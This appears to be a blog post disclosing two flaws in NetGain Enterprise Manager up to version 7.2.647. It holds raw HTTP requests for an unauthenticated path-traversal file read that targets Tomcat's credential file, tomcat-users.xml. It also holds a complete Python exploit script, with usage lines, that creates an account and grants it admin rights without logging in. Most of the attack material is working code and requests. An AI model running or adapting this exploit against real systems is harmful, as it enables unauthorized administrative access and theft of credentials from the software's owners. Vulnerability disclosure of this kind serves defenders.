NetGain Enterprise Manager <= 7.2.647 – Authentication Bypass / Local File Inclusion

We found a vulnerability on NetGain Enterprise Manager during a pentest. We think that the vulnerability is quite rare and worth to share.

Local File Inclusion
Normal Request:

POST /u/jsp/log/download_do.jsp HTTP/1.1
Host: 192.168.0.21:8081
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.21:8081/u/index.jsp
Cookie: JSESSIONID=8A172EB8DDBD08D1E6D25A1CE8CC74AC
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

filename=iossd.log

We can download another file with change the value on filename parameter and we can send this request without login.

Example:

POST /u/jsp/log/download_do.jsp HTTP/1.1
Host: 192.168.0.21:8081
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.21:8081/u/index.jsp
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 18

filename=../../tomcat/conf/tomcat-users.xml

Add User Account with Admin Privilege without Login
This application does not check the session on this request below, thus we can add user and assign admin privilege to it without authentication.

#!/usr/local/bin/python
# Exploit Title: Add User Account with Admin Privilege without Login
# Date: 2017-05-21
# Exploit Author: f3ci
# Vendor Homepage: http://www.netgain-systems.com
# Software Link: http://www.netgain-systems.com/free-edition-download/
# Version: <= v7.2.647 build 941
# Tested on: Windows 7
 
import requests
import sys
 
try:
 def create():
    ip = str(sys.argv[1])
    port = str(sys.argv[2])
    user = str(sys.argv[3])
    passwd = str(sys.argv[4])
 
    print "\033[1;32m[+]\033[1;m Try to Create user"
    url="http://"+ip+":"+port+"/u/jsp/security/user_save_do.jsp"
    data= {
        'new': "true", 
        'id': "", 
        'name': user, 
        'dname': "foobar", 
        'password': passwd, 
        'password2': passwd, 
        'description': "", 
        'emails': "foo@bar.com", 
        'mobileNumber': "000000", 
        'loginAttempts': "5",
        }
    response = requests.post(url, data=data)
    status = response.status_code
    if status == 200:
        print "\033[1;32m[+]\033[1;m Success!!"
        role()
    else:
        print "\033[91m[-]\033[91;m Create User Failed"
 
 
 def role():
    ip = str(sys.argv[1])
        port = str(sys.argv[2])
    user = str(sys.argv[3])
        passwd = str(sys.argv[4])
 
    print "\033[1;32m[+]\033[1;m Get admin role"
    url="http://"+ip+":"+port+"/u/jsp/security/role_save_do.jsp"
    data= {
        'name': "admin", 
        'description': "Administrator", 
        'users': [user,"admin"],
        }
    response = requests.post(url, data=data)
    status = response.status_code
    if status == 200:
        print "\033[1;32m[+]\033[1;m Success!!"
        print "\033[1;32m[+]\033[1;m Login with user:" +user+ " password:" + passwd
    else:
        print "\033[91m[-]\033[91;m Get admin role Failed"
 
 create();
 
except:
    print "\033[91m[!]\033[91;m Usage: %s <IP> <port> <username> <password>" % str(sys.argv[0])
    print "\033[91m[!]\033[91;m Ex: %s 127.0.0.1 8081 foobar passw0rd" % str(sys.argv[0])

Video

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

About f3ci